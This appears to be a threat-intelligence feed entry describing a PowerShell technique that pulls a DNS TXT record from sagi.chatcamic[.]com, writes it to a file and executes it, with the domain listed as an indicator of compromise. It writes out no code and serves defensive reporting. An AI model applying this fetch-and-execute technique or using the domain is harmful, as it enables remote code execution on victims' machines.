THREATNOIR
Subscribe
Back to Feed
MalwareApr 29, 2026

That PS code will get the TXT DNS record of sagi.chatcamic[.]com, write the content to a file and...

PowerShell script retrieves TXT DNS record from malicious domain and executes downloaded content.

Read at source

Summary

A PowerShell-based attack vector uses DNS TXT records as a command-and-control mechanism to fetch and execute arbitrary code from the domain sagi.chatcamic[.]com. The technique leverages DNS queries to retrieve instructions, writing them to a file before execution—a method commonly used in fileless malware and living-off-the-land attacks to evade detection.

Indicators of Compromise

  • domain — sagi.chatcamic[.]com
  • malware — PowerShell DNS TXT record execution

Entities

PowerShell (technology)DNS TXT Records (technology)